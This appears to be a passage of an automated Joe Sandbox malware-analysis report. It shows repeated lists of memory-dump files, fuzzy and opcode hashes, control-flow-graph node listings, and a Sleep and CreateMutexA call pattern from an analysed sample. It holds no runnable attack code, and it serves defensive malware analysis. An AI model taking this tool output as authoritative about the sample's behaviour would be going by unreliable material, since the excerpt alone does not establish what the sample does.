                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: e8c696a7f63f319cf73258c0c0703b5940dc0ab5d5a06673aeedc2ba087819e9
                                                                                                                                                                                                                                              • Instruction ID: 98ad147fcdf1ea5684ee68ef8aa6d255f7a6b6071cefabf368ac8f13f6e7719c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8c696a7f63f319cf73258c0c0703b5940dc0ab5d5a06673aeedc2ba087819e9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44319B317441048BFB18DB7CCC84BADBF62EB86324F204719E814D72D5C7799984A752

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 241 f4a079-f4a099 245 f4a0c7-f4a0e3 241->245 246 f4a09b-f4a0a7 241->246 247 f4a0e5-f4a0f1 245->247 248 f4a111-f4a130 245->248 249 f4a0bd-f4a0c4 call f5d663 246->249 250 f4a0a9-f4a0b7 246->250 252 f4a107-f4a10e call f5d663 247->252 253 f4a0f3-f4a101 247->253 254 f4a132-f4a13e 248->254 255 f4a15e-f4a916 call f580c0 248->255 249->245 250->249 256 f4a930-f4a994 call f76c6a Sleep CreateMutexA 250->256 252->248 253->252 253->256 260 f4a154-f4a15b call f5d663 254->260 261 f4a140-f4a14e 254->261 271 f4a996-f4a998 256->271 272 f4a9a7-f4a9a8 256->272 260->255 261->256 261->260 271->272 273 f4a99a-f4a9a5 271->273 273->272
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00F4A963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00FA3254), ref: 00F4A981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 52b11f2e9fde89b1e401a9242cfbd6152def20701558edd90e3dffe3b520a52b
                                                                                                                                                                                                                                              • Instruction ID: 7bdf22a6665fceb74576f572e3ea99661af71a310954eef7600348af56065e18
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52b11f2e9fde89b1e401a9242cfbd6152def20701558edd90e3dffe3b520a52b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78314871A801049BFB189B7CCC85B6DBB66DBC6324F244619E814D77E1C77A9980AB13

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 275 f4a1ae-f4a1ce 279 f4a1d0-f4a1dc 275->279 280 f4a1fc-f4a218 275->280 281 f4a1f2-f4a1f9 call f5d663 279->281 282 f4a1de-f4a1ec 279->282 283 f4a246-f4a265 280->283 284 f4a21a-f4a226 280->284 281->280 282->281 289 f4a935 282->289 287 f4a267-f4a273 283->287 288 f4a293-f4a916 call f580c0 283->288 285 f4a23c-f4a243 call f5d663 284->285 286 f4a228-f4a236 284->286 285->283 286->285 286->289 292 f4a275-f4a283 287->292 293 f4a289-f4a290 call f5d663 287->293 296 f4a953-f4a994 Sleep CreateMutexA 289->296 297 f4a935 call f76c6a 289->297 292->289 292->293 293->288 305 f4a996-f4a998 296->305 306 f4a9a7-f4a9a8 296->306 297->296 305->306 307 f4a99a-f4a9a5 305->307 307->306
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00F4A963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00FA3254), ref: 00F4A981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162225199.0000000001261000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_f40000_file.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 0e88ae28191477d525945f16a875f11fd488a1d5d76e4f6f7c34643a405ce4b5
                                                                                                                                                                                                                                              • Instruction ID: 39dd625677568cd8d0a0494f526702a838bf70baf01e7f6bd448c185e45ba618
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e88ae28191477d525945f16a875f11fd488a1d5d76e4f6f7c34643a405ce4b5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7316A71A401409BEB089B7CDC89B5DBB66EBC6324F204619E804D72E1D77A9AC0A712

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 309 f4a418-f4a438 313 f4a466-f4a482 309->313 314 f4a43a-f4a446 309->314 315 f4a484-f4a490 313->315 316 f4a4b0-f4a4cf 313->316 317 f4a45c-f4a463 call f5d663 314->317 318 f4a448-f4a456 314->318 321 f4a4a6-f4a4ad call f5d663 315->321 322 f4a492-f4a4a0 315->322 323 f4a4d1-f4a4dd 316->323 324 f4a4fd-f4a916 call f580c0 316->324 317->313 318->317 319 f4a93f-f4a949 call f76c6a * 2 318->319 340 f4a94e 319->340 341 f4a949 call f76c6a 319->341 321->316 322->319 322->321 329 f4a4f3-f4a4fa call f5d663 323->329 330 f4a4df-f4a4ed 323->330 329->324 330->319 330->329 342 f4a953-f4a994 Sleep CreateMutexA 340->342 343 f4a94e call f76c6a 340->343 341->340 345 f4a996-f4a998 342->345 346 f4a9a7-f4a9a8 342->346 343->342 345->346 347 f4a99a-f4a9a5 345->347 347->346
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00F4A963
                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00FA3254), ref: 00F4A981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160481470.0000000000F40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160499744.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160582688.0000000000FA9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160602010.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160620833.0000000000FB5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160637404.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160656189.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160846468.0000000001111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160868655.0000000001113000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160901644.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160921646.000000000112C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.000000000112E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2160989653.000000000113D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161052164.000000000113F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161288601.000000000114B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161522313.0000000001151000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161550389.0000000001166000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161658216.0000000001191000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161679655.0000000001192000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161698846.000000000119A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161718517.000000000119B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161747097.00000000011A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161767471.00000000011AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161786836.00000000011AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161806756.00000000011AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161827957.00000000011BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161846851.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161865361.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161882699.00000000011C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161903179.00000000011CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161921001.00000000011CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161941344.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161958553.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2161983324.00000000011E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.00000000011E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162011810.0000000001219000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162068904.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162087842.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162109453.000000000124A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162130377.000000000124B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162146506.000000000124C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162165584.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162181230.0000000001252000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2162209186.0000000001260000.00000040.00000001.01000000.00000003.sdmpDownload File
